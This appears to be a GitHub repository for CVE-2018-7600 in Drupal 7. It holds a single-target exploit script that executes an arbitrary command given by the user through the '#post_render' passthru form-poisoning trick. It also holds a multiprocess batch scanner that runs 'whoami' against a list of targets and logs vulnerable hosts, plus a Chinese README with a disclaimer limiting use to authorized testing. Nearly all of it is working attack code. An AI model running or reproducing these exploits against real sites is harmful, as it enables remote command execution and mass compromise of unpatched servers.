├── CVE-2018-7600-Drupal7-EXP.py
├── CVE-2018-7600-Drupal7.py
├── Drupal7-poc.png
└── README.md
/CVE-2018-7600-Drupal7-EXP.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # _*_ coding:utf-8 _*_
3 |
4 | import requests
5 | import argparse
6 | from bs4 import BeautifulSoup
7 |
8 | def get_args():
9 | parser = argparse.ArgumentParser()
10 | parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
11 | parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
12 | parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
13 | parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
14 | args = parser.parse_args()
15 | return args
16 |
17 | def pwn_target(target, function, command, proxy):
18 | requests.packages.urllib3.disable_warnings()
19 | proxies = {'http': proxy, 'https': proxy}
20 | print('[*] Poisoning a form and including it in cache.')
21 | get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}
22 | post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
23 | r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
24 | soup = BeautifulSoup(r.text, "html.parser")
25 | try:
26 | form = soup.find('form', {'id': 'user-pass'})
27 | form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
28 | if form_build_id:
29 | print('[*] Poisoned form ID: ' + form_build_id)
30 | print('[*] Triggering exploit to execute: ' + command)
31 | get_params = {'q':'file/ajax/name/#value/' + form_build_id}
32 | post_params = {'form_build_id':form_build_id}
33 | r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
34 | parsed_result = r.text.split('[{"command":"settings"')[0]
35 | print(parsed_result)
36 | except:
37 | print("ERROR: Something went wrong.")
38 | raise
39 |
40 | def main():
41 | args = get_args()
42 | pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())
43 |
44 |
45 | if __name__ == '__main__':
46 | args = get_args()
47 | pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())
48 |
--------------------------------------------------------------------------------
/CVE-2018-7600-Drupal7.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # _*_ coding:utf-8 _*_
3 |
4 | '''
5 | ____ _ _ _ _ __ __ _
6 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
7 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
8 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
9 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
10 | '''
11 |
12 | import re
13 | import requests
14 | from multiprocessing import Pool, Manager
15 |
16 | headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0",}
17 |
18 | def saveinfo(result):
19 | if result:
20 | fw=open('result.txt','a')
21 | fw.write(result+'\n')
22 | fw.close()
23 |
24 | def poc(target,q):
25 | print('加载目标:'+target)
26 | requests.packages.urllib3.disable_warnings()
27 | get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#type]':'markup', 'name[#markup]': 'whoami'}
28 | post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
29 | try:
30 | r = requests.post(target, params=get_params, data=post_params, verify=False,allow_redirects=False)
31 | rule1 = re.compile(r'')
32 | form_build_id = rule1.findall(r.text)
33 | if form_build_id:
34 | get_params = {'q':'file/ajax/name/#value/' + form_build_id[0]}
35 | post_params = {'form_build_id':form_build_id[0]}
36 | r = requests.post(target, params=get_params, data=post_params, verify=False)
37 | rule2 = re.compile(r'(.*?)\[{"command":"settings","settings":.*?')
38 | parsed_result=rule2.findall(r.text.replace('\n','').replace(' ','').replace('\r','').replace('\t',''))
39 | if parsed_result and len(parsed_result[0])>0:
40 | print(("Found a vulnerable target:"+target+"\tPermissions of the current user is:"+parsed_result[0]))
41 | return ("Found a vulnerable target:"+target+"\tPermissions of the current user is:"+parsed_result[0])
42 | except:
43 | pass
44 | q.put(target)
45 |
46 |
47 | def poolmana():
48 | p = Pool(30)
49 | q = Manager().Queue()
50 | fr = open('target.txt', 'r')
51 | ips=fr.readlines()
52 | fr.close()
53 | for i in ips:
54 | i=i.replace('\n','')
55 | p.apply_async(poc, args=(i, q,),callback=saveinfo)
56 | p.close()
57 | p.join()
58 |
59 | def run():
60 | poolmana()
61 |
62 |
63 | if __name__ == '__main__':
64 | run()
--------------------------------------------------------------------------------
/Drupal7-poc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rabbitmask/CVE-2018-7600-Drupal7/9bc2878d241a52de3e7e0382d68bd846fe70521a/Drupal7-poc.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-7600-Drupal7
2 | CVE-2018-7600【Drupal7】批量扫描工具。
3 |
4 | 主文件:CVE-2018-7600-Drupal7.py
5 | 其实本质是封装了`whoami`的exp
6 | Drupal7/8的原理是一样的但该脚本当是只做了7的适配
7 | 提供`target.txt`作为目标输入,结果自动输出到`result.txt`文件
8 | 因为是好久前写的脚本现在分享一下,有不够精致的地方还请多多包涵
9 |
10 | ##### Demo:
11 |
12 |
13 |
14 | 为了防止你们说我水,顺便丢一个单目标的EXP
15 |
16 | ##### 本脚本仅用于授权测试,请勿用于非法用途,请遵守游戏规则。
17 |
--------------------------------------------------------------------------------
